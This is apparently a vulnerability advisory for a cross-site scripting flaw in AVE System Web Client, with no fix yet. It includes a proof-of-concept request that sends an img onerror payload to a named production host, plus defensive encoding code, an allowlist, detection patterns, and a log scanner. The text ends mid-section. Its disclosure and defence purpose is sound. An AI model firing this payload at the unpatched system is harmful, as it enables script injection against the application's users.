XSS Vulnerability in AVE System Web Client

Version Details

Version: AVE System Web Client 2.1.131.13992

Fixed Version: None

CVE ID: None

Vulnerability Type: Cross Site Scripting (XSS)

Description of the Product

AVE Web Client is a lightweight version of AVE Client. It doesn’t have to be installed and can be run in any Web browser (Chrome, IE, Firefox, etc.). It is a thin client designed for basic work with AVE (checking the progress of data reading, generating reports, reading and displaying data).

This module is also intended for outside traders, who need to have a quick overview of customers’ energy consumption, and for end users, who can display only selected data, not complete sets of meter reading data.

Description of the Vulnerability

Due to insufficient input validation and output encoding in all input fields within the application, a cross-site scripting (XSS) vulnerability exists: user-supplied values are reflected into the page in a way that lets the browser execute attacker-controlled JavaScript.

Root Cause

The XSS vulnerability stems from user input being processed and reflected into the page in a way that allows JavaScript execution. For example, if HTML encoding is not applied to input received from users before it is written into the document, it should be implemented so that the browser's HTML parser never receives tags or attributes capable of executing JavaScript.

Additionally, where markup or attribute values are built from user input, an allowlist of permitted attributes should be enforced so that attributes capable of executing JavaScript (event handlers such as onerror) are rejected; otherwise, an attacker could inject and execute JavaScript code.
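The following is an added example, not AVE System code, showing the two mitigations described in this section applied to the filter value from the PoC request: contextual HTML encoding at the point where the name is inserted into markup, and an attribute allowlist for code that builds elements from user-supplied attribute maps. The rendering functions, tag and attribute lists are hypothetical; only the filter value is taken from the page.

```javascript
// Added example (not AVE System code): output encoding and an attribute allowlist,
// the two mitigations from the Root Cause section, applied to the PoC's filter value.

// The filter query parameter exactly as sent in the PoC request (JSON with a name field).
const FILTER_PARAM = '{"name":"<img src/onerror=prompt(1)>"}';

// Characters with meaning to the HTML parser, mapped to entity references. "/" is
// encoded too because HTML5 accepts it as an attribute separator, which is what the
// "src/onerror" form in the PoC relies on.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern (hypothetical rendering code): the user-controlled name is
// concatenated straight into markup, so the browser parses the <img> tag and fires
// its onerror handler.
function renderFilterLabelVulnerable(filterJson) {
  const filter = JSON.parse(filterJson);
  return `<span class="filter">${filter.name}</span>`;
}

// Hardened: the same rendering with encoding applied at the point of insertion,
// so the name is displayed as literal text.
function renderFilterLabel(filterJson) {
  const filter = JSON.parse(filterJson);
  return `<span class="filter">${escapeHtml(filter.name)}</span>`;
}

// Attribute allowlist for code that builds elements from user-supplied attribute maps
// (hypothetical lists). Anything not listed, including every on* event-handler attribute,
// is rejected, and the values of allowed attributes are still encoded.
const ALLOWED_TAGS = new Set(['span', 'div', 'td']);
const ALLOWED_ATTRIBUTES = new Set(['class', 'title', 'data-id']);

function buildElementMarkup(tag, attributes) {
  const tagName = String(tag).toLowerCase();
  if (!ALLOWED_TAGS.has(tagName)) throw new Error(`tag not allowed: ${tagName}`);
  const parts = [];
  for (const [name, value] of Object.entries(attributes)) {
    const attrName = name.toLowerCase();
    if (!ALLOWED_ATTRIBUTES.has(attrName)) throw new Error(`attribute not allowed: ${attrName}`);
    parts.push(`${attrName}="${escapeHtml(value)}"`);
  }
  return `<${tagName}${parts.length ? ' ' + parts.join(' ') : ''}></${tagName}>`;
}

// Check for unit tests or a response-body monitor: does the markup still carry an
// event-handler attribute? The separator class includes "/" because "<img src/onerror=...>"
// is valid HTML and a whitespace-only pattern would miss it.
function containsEventHandler(markup) {
  return /[\s\/]on[a-z]+\s*=/i.test(markup);
}

console.log(renderFilterLabelVulnerable(FILTER_PARAM)); // an executable <img> reaches the page
console.log(renderFilterLabel(FILTER_PARAM));           // rendered as inert text
```

The encoding function is the default path for every reflected value; the allowlist is only for the narrower case where the application deliberately lets user data choose attributes, and it rejects rather than tries to clean what it does not recognise.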

Proof of Concept (PoC)

Example HTTP Request

GET /website/api/GetSchedulerProfiles.rails?_dc=1730446398457&sessionId=e59a5def61a9f6f39d776dad156c852c&schedulerIds=573&filter={"name":"<img src/onerror=prompt(1)>"}&page=1&start=0&limit=50 HTTP/1.1
Host: www.ave-system.com
Cookie:
Sec-Ch-Ua-Platform: "macOS"
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.59 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.ave-system.com/website/jsclient/index.html
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
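As an added detection-side example (not AVE System code), the block below scans access-log entries for query parameters whose decoded value contains HTML markup, which is the footprint a request like the one above leaves in web-server logs. The log format, client addresses and timestamps are constructed; the first two sample lines carry the PoC's filter value as a browser would send it (percent-encoded, once minimally and once fully), and the other two are benign requests to the same endpoint.

```javascript
// Added example (not AVE System code): detection logic over constructed access-log
// lines in a simple "<time> <client> \"<request line>\" <status>" layout.
const SAMPLE_LOG = [
  '2024-11-01T07:33:18Z 203.0.113.5 "GET /website/api/GetSchedulerProfiles.rails?_dc=1730446398457&schedulerIds=573&filter=%7B%22name%22%3A%22%3Cimg%20src/onerror%3Dprompt(1)%3E%22%7D&page=1&start=0&limit=50 HTTP/1.1" 200',
  '2024-11-01T07:33:21Z 203.0.113.5 "GET /website/api/GetSchedulerProfiles.rails?schedulerIds=573&filter=%7B%22name%22%3A%22%3Cimg%20src%2Fonerror%3Dprompt%281%29%3E%22%7D HTTP/1.1" 200',
  '2024-11-01T07:35:02Z 198.51.100.7 "GET /website/api/GetSchedulerProfiles.rails?schedulerIds=12&filter=%7B%22name%22%3A%22Office%22%7D&page=1 HTTP/1.1" 200',
  '2024-11-01T07:35:40Z 198.51.100.7 "GET /website/api/GetSchedulerProfiles.rails?note=1%20%3C%202&page=1 HTTP/1.1" 200',
];

const LOG_LINE = /^(\S+) (\S+) "([A-Z]+) (\S+) HTTP\/[\d.]+" (\d{3})$/;

// Checks applied to each percent-decoded parameter value. A tag open is "<" followed
// directly by a tag-name character, so "1 < 2" does not qualify; the handler check accepts
// "/" as a separator because "<img src/onerror=...>" is valid HTML.
const CHECKS = [
  ['html-tag', /<[a-z!\/]/i],
  ['event-handler', /[\s\/]on[a-z]+\s*=/i],
];

// Parses one log line into its fields; the query string is decoded by the URL parser.
// The base host is a placeholder needed only because the logged target is relative.
function parseAccessLogLine(line) {
  const m = LOG_LINE.exec(line);
  if (!m) return null;
  const [, time, client, method, target, status] = m;
  const url = new URL(target, 'http://log.invalid');
  return { time, client, method, path: url.pathname, status: Number(status), params: url.searchParams };
}

// Returns the parameters whose decoded value trips at least one check, with the reasons.
function findSuspiciousParams(params) {
  const hits = [];
  for (const [name, value] of params) {
    const reasons = CHECKS.filter(([, re]) => re.test(value)).map(([label]) => label);
    if (reasons.length) hits.push({ param: name, reasons });
  }
  return hits;
}

// Runs the checks over every parsable line and returns one finding per suspicious parameter.
// The raw value is deliberately left out of the finding so alerts do not re-carry the payload.
function scanAccessLog(lines) {
  const findings = [];
  for (const line of lines) {
    const entry = parseAccessLogLine(line);
    if (!entry) continue;
    for (const hit of findSuspiciousParams(entry.params)) {
      findings.push({ time: entry.time, client: entry.client, path: entry.path, ...hit });
    }
  }
  return findings;
}

for (const finding of scanAccessLog(SAMPLE_LOG)) console.log(JSON.stringify(finding));
```

Decoding before matching is the important part: the same filter value appears in the two flagged lines with different percent-encodings, and a rule that matches the raw query string would need one pattern per encoding. The tag check is a heuristic and will also flag values such as "a<b", so tune it per parameter before turning findings into alerts.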

Impact of XSS Vulnerabilities

The actual impact of an XSS attack generally depends on the nature of the application, its functionality and data, and the status of the compromised user. For example: